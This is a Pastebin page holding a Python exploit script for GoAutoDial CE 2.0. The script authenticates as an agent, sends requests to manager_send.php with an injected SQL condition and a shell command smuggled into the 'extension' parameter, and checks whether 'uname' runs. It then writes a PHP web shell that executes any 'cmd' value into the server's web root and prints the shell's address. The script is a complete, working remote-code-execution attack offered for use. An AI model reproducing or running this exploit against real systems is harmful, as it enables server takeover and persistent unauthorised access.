API tools faq
paste
Advertisement
Canel

New2

Canel
Jan 20th, 2016
99
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ActionScript 2.46 KB | None | 0 0
raw download clone embed print report
  1. # Title : GoAutoDial CE 2.0 Shell Upload
  2. # Date : 28/02/2015
  3. # Author : R-73eN
  4. # Software : GoAutoDial CE 2.0
  5. # Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1  GoAutoDial CE 2.0
  6.  
  7. import socket
  8. import sys
  9. banner = "\n\n"
  10. banner +="  ___        __        ____                 _    _  \n"  
  11. banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \ | |    \n"
  12. banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \   / _ \ | |    \n"
  13. banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
  14. banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
  15. print banner
  16. CRLF = "\r\n"
  17. def checkvuln():
  18.     command = "uname"
  19.     evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
  20.     s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  21.     s.connect((host,80))
  22.     evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
  23.     s.send(evilREQ)
  24.     a = s.recv(1024)
  25.     if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1):
  26.         print '[ + ] Server Is vulnerable [ + ]\n'
  27.         shellupload()
  28.     else:
  29.         print '[ - ] Server is not vulnerable [ - ]\n'
  30.     s.close()
  31.  
  32.  
  33. def shellupload():
  34.     command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php"
  35.     #command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl"
  36.     command = command.replace(" ", "%20")
  37.     evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
  38.     s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  39.     s.connect((host,80))
  40.     evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
  41.     s.send(evilREQ)
  42.     a = s.recv(1024)
  43.     if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1):
  44.         print '[ + ] Shell uploaded successfully [ + ]\n'
  45.         print '[ + ] http://' + host + '/infogen.php [ + ]\n'
  46.     else:
  47.         print '[ - ] Shell upload failed.... [ - ]'
  48.     s.close()
  49.  
  50. if(len(sys.argv) < 4):
  51.     print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n'
  52. else:
  53.     host = sys.argv[1]
  54.     path = sys.argv[2]
  55.     user = sys.argv[3]
  56.     password = sys.argv[4]
  57.     checkvuln()
  58.     print 'Visit Us : http://infogen.al/'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!